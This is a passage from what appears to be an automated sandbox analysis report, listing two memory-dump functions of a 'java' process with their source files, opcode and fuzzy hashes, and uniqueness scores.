                          Function 026345E9 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002622000.00000040.00000800.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2622000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d23d465f838d1d9aeb10ea7fab81d1836e97930dd692082d3411994a74a49fed
                          • Instruction ID: 284c4342ce9274081a24babd8f7f2e58a918a8673e654b3d6a72856d9d8adf99
                          • Opcode Fuzzy Hash: d23d465f838d1d9aeb10ea7fab81d1836e97930dd692082d3411994a74a49fed
                          • Instruction Fuzzy Hash: 21F0C2B6D00A16ABDB248F61C1047DAFBB4BB48714F14461AC52C63310D3787469CFC0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 026203C0 Relevance: .1, Instructions: 70COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002620000.00000040.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2620000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a012a9fb5cf5d9e1554885d89a3030425dd9bcc3e3bcfa4e280c99466c7885fc
                          • Instruction ID: 5baaa2b0d012560f36cd3b15094990779f067a148bb5c90f4ab34e8f56af8ebe
                          • Opcode Fuzzy Hash: a012a9fb5cf5d9e1554885d89a3030425dd9bcc3e3bcfa4e280c99466c7885fc
                          • Instruction Fuzzy Hash: E921F6BA5082668FDB358F198C403D9B7E5FB58314F21882EDECDE7710D3306A898B91
                          Uniqueness

                          Uniqueness Score: -1.00%